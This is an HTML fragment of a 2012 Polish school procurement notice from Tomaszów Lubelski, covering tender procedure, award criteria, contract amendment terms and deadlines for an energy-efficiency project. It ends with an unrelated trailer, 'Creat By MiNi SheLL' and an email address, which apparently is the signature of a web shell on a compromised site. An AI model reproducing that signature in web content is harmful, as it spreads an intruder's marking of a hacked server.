<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający ma prawo odstąpić od umowy w następujących wypadkach:
1/ jeżeli wykonawca nie podjął się wykonania obowiązków wynikających z niniejszej
umowy lub przerwał ich wykonanie, zaś przerwa trwała dłużej niż 14 dni,
2/ Jeżeli wykonawca wykonuje swoje obowiązki w sposób nienależyty i pomimo wezwania zamawiającego nie nastąpiła poprawa w wykonaniu tych obowiązków,
3/w razie postawienia firmy wykonawcy w stan likwidacji lub upadłości,
4/w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, z zachowaniem wymogów, o których mowa w art. 145 ustawy Prawo zamówień publicznych.
2. W razie odstąpienia od umowy przez wykonawcę z przyczyn wymienionych w ust. 1 pkt 1,2,3 zamawiający ma prawo do ryczałtowej kary umownej w wysokości 30% wartości umowy.
3.Zamawiający przewiduje istotne zmiany postanowień zawartej umowy ( terminu wykonania zamówienia ) w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w przypadku:
1) wydłużenia terminu zakończenia realizacji umowy na wskutek zaistnienia siły wyższej w stosunku do wykonywanych robót budowlanych. O interpretacji siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót budowlanych z tego powodu będzie decydował zamawiający w trakcie realizacji robót,
2) wydłużenia terminu  realizacji zamówienia spowodowane zmianami: 
w dokumentacji technicznej, wystąpieniem robót dodatkowych, których wykonanie powoduje przesunięcie terminu wykonania zadania głównego, w uzasadnionych przypadkach, gdy realizacja zadania (robót budowlanych) według dokumentacji technicznej i SST powodowała by wadliwe wykonanie przedmiotu umowy,
3)zmniejszenia zakresu przedmiotu umowy z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym,
4)zmiany wyznaczonego przez Wykonawcę inspektora nadzoru inwestorskiego pod
warunkiem, że nowy wyznaczony inspektor nadzoru inwestorskiego spełniać będzie
wymagania Zamawiającego wskazane w dokumentacji przetargowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsnr3.tk/index.php?option=com_content&view=category&id=21&Itemid=20<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3 w Tomaszowie Lubelskim, ul. Hallera 5,  22-600 Tomaszów Lubelski,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 11:00, miejsce: siedziba zamawiajacego - Zespół  Szkół Nr 3 w Tomaszowie Lubelskim, ul. Hallera 5, 22-600 Tomaszów Lubelski,  sekretariat pok. nr 40 - parter szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu priorytetowego - System  Zielonych Inwestycji 
część 1  Zarządzanie energią w budynkach użyteczności publicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com